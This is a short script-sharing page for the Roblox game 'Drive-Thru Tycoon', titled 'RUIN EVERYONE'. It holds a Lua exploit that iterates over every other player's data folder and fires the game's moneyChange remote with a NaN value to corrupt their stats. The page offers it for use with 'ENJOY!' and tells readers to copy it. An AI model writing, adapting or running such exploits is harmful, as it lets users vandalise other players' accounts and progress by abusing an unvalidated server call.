Drive-Thru Tycoon Script | RUIN EVERYONE

Created by Ezpi

Features:

  • RUIN EVERYONE
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local User = tostring(game:GetService("Players").LocalPlayer.UserId)
local Cash = ReplicatedStorage[User].Cash.Value

for _, A_1 in next, ReplicatedStorage:GetChildren() do
    if A_1:IsA("Folder") and A_1:FindFirstChild("isBanned") and A_1.Name ~= User then
        for _, A_2 in next, A_1:GetChildren() do
            if A_2:IsA("IntValue") then
                ReplicatedStorage.moneyChange:FireServer(Cash, A_2, 0/0)
            end
        end
    end
end

ENJOY!

Warning: DO NOT DOWNLOAD anything from this page, you’re only here to copy the script!